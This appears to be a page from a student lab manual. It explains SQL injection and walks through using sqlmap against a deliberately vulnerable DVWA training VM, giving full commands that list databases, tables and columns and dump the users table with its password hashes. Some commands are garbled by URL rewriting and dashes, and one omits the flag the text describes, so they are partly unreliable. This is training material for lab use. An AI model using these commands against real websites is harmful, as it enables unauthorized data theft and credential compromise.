Practical: - 6

Examine SQL injection attack, Perform SQL injection with

Sqlmap on vulnerable website found using DVWA.

SQL injection Attack:

SQL injection is a web security vulnerability that allows an attacker to interfere with
the queries that an application makes to its database. It generally allows an attacker to view
data that they are not normally able to retrieve. This might include data belonging to other
users, or any other data that the application itself is able to access. In many cases, an attacker
can modify or delete this data, causing persistent changes to the application's content or
behaviour.
In some situations, an attacker can escalate an SQL injection attack to compromise
the underlying server or other back-end infrastructure, or perform a denial-of-service attack.
A successful SQL injection attack can result in unauthorized access to sensitive data,
such as passwords, credit card details, or personal user information. Many high-profile data
breaches in recent years have been the result of SQL injection attacks, leading to reputational
damage and regulatory fines. In some cases, an attacker can obtain a persistent backdoor into
an organization's systems, leading to a long-term compromise that can go unnoticed for an
extended period.

SQL injection with DVWA:

Start your DVWA VM and the Kali Linux box. To find the cookies value and to monitor sqlmap
activity it’s best to use a proxy. Open the OWASP ZAP (you can also try using Burp Suite) and
click the firefox button:

67
Navigate to the DVWA web page and add the current domain to scope clicking the top left
button of the ZAP HUD:

Login, set the security to ‘low’ and go to SQL Injection (Blind). Search for the ID ‘1’. The
parameters we’ll need for SQLmap are displayed in ZAP, so go and take a look

Create a command with right parameters:

68
$ sqlmap -u “http://192.168.56.101/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --
proxy=http://127.0.0.1:8080 --cookie=”PHPSESSID=1tmgthfok042dslt7lr7nbv4cb;
security=low”

We’ve discovered the DBMS is MySQL 5.0.12, the OS is Ubuntu and the web server is Apache
2.4.29.Let’s list the databases available using the “--dbs” parameter:
$ sqlmap -u “http://192.168.56.101/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --
proxy=http://127.0.0.1:8080 --cookie=”PHPSESSID=1tmgthfok042dslt7lr7nbv4cb;
security=low”

69
Now, find the tables with ‘-D dvwa --tables’
$ sqlmap -u “http://192.168.56.101/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --
proxy=http://127.0.0.1:8080 --cookie=”PHPSESSID=1tmgthfok042dslt7lr7nbv4cb;
security=low” -D dvwa –tables

Now we’ll take a look at the columns ‘-D dvwa -T users --columns’:
$ sqlmap -u “http://192.168.56.101/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --
proxy=http://127.0.0.1:8080 --cookie=”PHPSESSID=1tmgthfok042dslt7lr7nbv4cb;
security=low” -D dvwa -T users –columns

70
And now we’ll get the dump:
$ sqlmap -u “http://192.168.56.101/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --
proxy=http://127.0.0.1:8080 --cookie=”PHPSESSID=1tmgthfok042dslt7lr7nbv4cb;
security=low” -D dvwa -T users –dump

We have obtained the users table and password hashes!!! At the end SQLMap will suggest the
use of a dictionary for the hashes. It’s optional.

Sign: _________________

71